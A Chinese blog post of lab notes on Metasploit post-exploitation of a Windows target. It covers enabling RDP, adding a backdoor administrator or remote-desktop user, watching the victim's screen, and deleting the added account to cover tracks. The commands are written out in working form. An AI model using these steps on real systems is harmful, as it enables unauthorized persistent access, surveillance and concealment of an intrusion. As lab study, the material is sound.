用户添加&远程桌面控制|内网渗透学习(二)

用户添加&远程桌面控制|内网渗透学习(二)

添加用户&打开并连接3389配置

开启3389远程桌面:
run post/windows/manage/enable_rdp
run getgui -e

在目标机器添加用户:
run getgui -u admin -p admin #meterpreter模块的功能,通过-u指定用户名,-p指定密码即可添加用户
net localgroup administrators admin /add  #windows通过这个命令添加用户到管理员用户组

远程连接桌面
rdesktop -u username -p password ip #Linux
mstsc.exe #Windows中的远程桌面

打开RDP远程桌面

image-20220923212727754

添加用户

image-20220923213450962

虽然执行命令返回说是失败, 但是其实用户已经添加到系统里面了(不知道为什么会这样)

image-20220923213353068

之后将admin1用户添加为管理员用户组

image-20220923215127421

添加成功后可以通过net localgroup administrators查看administrators用户组有哪些用户

image-20220923215711621

Windows远程桌面登录新用户

登录administrators用户组用户

使用远程连接的时候可以看到靶机的远程桌面功能, 但是这里登录失败了, 密码是正确的,但是显示策略组错误, 然后查看了一下admin1所属的用户组确实如此, 后面发现问题出在用户组添加的命令输错了, 原为administrators但是一开始添加的时候输成了administrator,在这里也简单做个用户组权限不足的记录吧

192.168.92.129

密码错误的时候是这样的

image-20220923214039031

用户组权限不足的时候显示策略不允许

image-20220923215425082

成功添加为administrators用户组后就可以成功登录了

image-20220923215733702

登录remote desktop users用户组用户

除了administrators之外还有个用户组remote desktop users看着就很明显是用于远程登录的,

image-20220923220517706

然后我新添加了一个新的用户admin2并且将其加入到remote desktop users用户组中, 之后可以看到确实是可以登录的

image-20220923220819448

image-20220923220729103

image-20220923220336498

Linux连接远程桌面

在kali中有自带的远程桌面连接工具rdesktop用于远程连接, 命令格式如下:

rdesktop -u username -p password ip

image-20220923221231277

桌面截图查看

msf的meterpreter有下面几个模块和命令支持篇目截图查看用户电脑使用情况

screenshot  #会保存屏幕截图到/root下
use espia   #这个也是用于截图查看的, 但是不大会怎么用...
screengrab  #和screenshot一样,但是会自动打开这个图片,个人感觉这个最好用
screenshare #会生成一个html文件并自动在浏览器打开,并且会不断时时更新跟视频差不多,但是默认保存到/root会有权限限制,复制一下到其他地方在访问即可,另外我打开之后画面完全没出来过,太卡了不建议使用

image-20220923223250201

image-20220923223904553

清除痕迹::删除用户

使用post模块delete_user删除用户

use post/windows.manage/delete_user 
set USERNAME admin2
set session [sessionid]
run

执行完了之后可以看到之前remote desktop users用户组的admin1用户被成功删除

image-20220926223250583

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇